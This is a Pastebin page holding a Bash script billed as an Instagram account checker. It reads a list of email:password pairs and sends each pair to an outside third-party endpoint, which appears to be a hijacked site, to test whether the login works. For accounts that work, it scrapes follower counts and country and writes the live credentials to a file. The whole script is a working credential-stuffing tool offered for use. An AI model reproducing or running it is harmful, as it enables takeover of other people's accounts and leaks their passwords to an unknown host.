Advertisement
Walker404

Instagram Account Checker [ + Get Info ]

Dec 11th, 2018
1,455
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.18 KB | None | 0 0
  1. #!/bin/bash
  2. # NTB 4 WORLD
  3. #MinorityCode_
  4. waktu=$(date '+%Y-%m-%d %H:%M:%S')
  5. RED="\e[31m"
  6. GREEN="\e[32m"
  7. YELLOW="\e[33m"
  8. CYAN="\e[36m"
  9. LIGHTGREEN="\e[92m"
  10. MARGENTA="\e[35m"
  11. BLUE="\e[34m"
  12. BOLD="\e[1m"
  13. NOCOLOR="\e[0m"
  14. PUTIH='\033[1;37m'
  15. header () {
  16. printf "${RED}
  17.  ▄▄▌  ▄▄▄ . ▄▄▄· ▄ •▄  ▄▄·       ·▄▄▄▄  ▄▄▄ .
  18.  ██•  ▀▄.▀·▐█ ▀█ █▌▄▌▪▐█ ▌▪▪     ██▪ ██ ▀▄.▀·
  19.  ██▪  ▐▀▀▪▄▄█▀▀█ ▐▀▀▄·██ ▄▄ ▄█▀▄ ▐█· ▐█▌▐▀▀▪▄
  20.  ▐█▌▐▌▐█▄▄▌▐█ ▪▐▌▐█.█▌▐███▌▐█▌.▐▌██. ██ ▐█▄▄▌
  21.  .▀▀▀  ▀▀▀  ▀  ▀ ·▀  ▀·▀▀▀  ▀█▄▀▪▀▀▀▀▀•  ▀▀▀
  22.     ${RED}------------------------------------${NOCOLOR}
  23.           Checker By NTB4WORLD
  24.     ${RED}------------------------------------${NOCOLOR}
  25. "
  26. }
  27. igcheck(){
  28.   # apine=`curl -s "http://instarget.net/api.php?x=$1|$2"`
  29.     apine=`curl -s "https://www.shirtikvahfrisco.org/apix.php?user=$1&pass=$2"`
  30.     cox=$( echo "$apine" | grep -Po '(?<=authenticated": )[^",]*' )
  31.     if [[ $cox == "true" ]]; then
  32.     cux=`curl -s "https://www.instagram.com/${1}/" -H 'authority: www.instagram.com' -H 'cache-control: max-age=0' -H 'upgrade-insecure-requests: 1' -H 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36' -H 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'accept-encoding: gzip, deflate, br' -H 'accept-language: en-US,en;q=0.9' --compressed`
  33.     getInfoNama=$( echo "$cux" | grep -Po '(?<=name":")[^"]*' | head -2 | tail -2)
  34.     getFoll=$( echo "$cux" | grep -Po '(?<=userInteractionCount":")[^"]*')
  35.     getCountry=$( echo "$cux" | grep -Po '(?<=country_code":")[^"]*')
  36.     getUser=$( echo "$cux" | grep -Po '(?<=alternateName":")[^"]*')
  37.     getFollowing=$(echo "$cux" | grep -Po '(?<=count":)[^}]*' | head -2 | tail -1)
  38.     printf "${NOCOLOR}[$i]${GREEN}[LIVE] => $1:$2\n"
  39.     echo "${GREEN} INFO : $getUser | Follower : $getFoll | Following : $getFollowing | Country : $getCountry
  40.    "
  41.     echo "$1|$2 | Follower : $getFoll | Following : $getFollowing" >> IG-LIVE.txt
  42.     else
  43.     printf "${NOCOLOR}[$i]${RED}[DIE] => $1:$2${NC} \n"
  44.     echo "$1|$2" >> IG-DIE.txt
  45. fi
  46. }
  47.  
  48. header
  49. echo ""
  50. echo "List In This Directory : "
  51. ls
  52. echo "Delimeter list -> email:password "
  53. echo -n "Masukan File List : "
  54.     read list
  55.     echo "[+] Calculate your mailist file"
  56.     echo "############################"
  57.     totalLines=`grep -c ":" $list`
  58.     echo "There are $totalLines of list."
  59.     echo "############################"
  60.     if [ ! -f $list ]; then
  61. echo "$list No Such File"
  62.     exit
  63.     fi
  64.     x=$(gawk -F: '{ print $1 }' $list)
  65.     y=$(gawk -F: '{ print $2 }' $list)
  66.     IFS=$'\r\n' GLOBIGNORE='*' command eval  'emailgblg=($x)'
  67.     IFS=$'\r\n' GLOBIGNORE='*' command eval  'passwordna=($y)'
  68.     for (( i = 0; i < "${#emailgblg[@]}"; i++ )); do
  69.         emailna="${emailgblg[$i]}"
  70.         kontol="${passwordna[$i]}"
  71.  
  72.         igcheck $emailna $kontol
  73.     done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement